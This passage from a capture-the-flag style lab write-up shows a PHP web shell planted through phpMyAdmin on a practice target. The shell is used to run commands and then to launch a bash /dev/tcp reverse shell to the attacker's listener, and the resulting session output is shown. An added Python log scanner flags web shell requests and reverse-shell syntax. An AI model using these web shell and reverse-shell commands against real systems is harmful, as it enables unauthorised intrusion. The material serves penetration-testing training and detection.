Webshell


Using the authenticated phpMyAdmin session, a web shell is written to /home/www/webshell.php.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ curl -s http://$IP/webshell.php?cmd=id 
uid=1028(www) gid=1028(www) groups=1028(www)

Code execution confirmed. This is the PHP web server on the target's port 80. Fuzzing had shown that the web root was being served from somebody's home directory; that somebody turned out to be the www user.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cmd="$(echo 'bash -c "bash -i >& /dev/tcp/192.168.45.191/9998 0>&1"' | urlencode)" ; echo $cmd ; curl -s http://$IP/webshell.php?cmd=$cmd
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.191%2F9998%200%3E%261%22%0A

Invoking a reverse shell through the web shell, caught by the listener below.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ nnc 9998                        
listening on [any] 9998 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.239.148] 38962
bash: cannot set terminal process group (1962): Inappropriate ioctl for device
bash: no job control in this shell
www@red:~$ whoami
whoami
www
www@red:~$ hostname
hostname
red.initech
www@red:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:7b:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.239.148/24 brd 192.168.239.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target as the www user via a PHP web shell written through the database.
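As an added example (not part of the original writeup), the Python script below shows what the web shell activity above looks like to a defender reading the Apache access log: it URL-decodes each query string and flags command-style parameters and shell syntax such as the /dev/tcp reverse shell. The log lines are constructed samples modelled on the requests in this section.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log samples (hypothetical, not captured from the target).
SAMPLE_LOG = """\
192.168.45.191 - - [10/May/2024:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.45.191 - - [10/May/2024:10:02:33 +0000] "GET /webshell.php?cmd=id HTTP/1.1" 200 58 "-" "curl/8.5.0"
192.168.45.191 - - [10/May/2024:10:03:07 +0000] "GET /webshell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.191%2F9998%200%3E%261%22%0A HTTP/1.1" 200 0 "-" "curl/8.5.0"
192.168.45.191 - - [10/May/2024:10:04:40 +0000] "GET /search.php?q=bash%20scripting HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names typical of one-line PHP shells (e.g. <?php system($_GET['cmd']); ?>).
SUSPECT_PARAMS = {"cmd", "exec", "command"}
# Shell syntax that has no business inside a legitimate query-string value.
SHELL_MARKERS = re.compile(r"(/dev/tcp/|bash\s+-i|\bnc\b.*\s-e\b|>&|\|\s*sh\b)")


def scan_access_log(text):
    """Return one finding per query parameter that looks like web shell use."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m.group("target"))
        # parse_qs splits on '&' first, then percent-decodes, so an encoded
        # '%26' inside a value (as in '>&') stays part of that value.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:
                reasons = []
                if name.lower() in SUSPECT_PARAMS:
                    reasons.append(f"command-style parameter '{name}'")
                if SHELL_MARKERS.search(value):
                    reasons.append("shell syntax in value")
                if reasons:
                    findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": url.path,
                                     "param": name, "value": value.strip(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']!r}: {', '.join(f['reasons'])}")
```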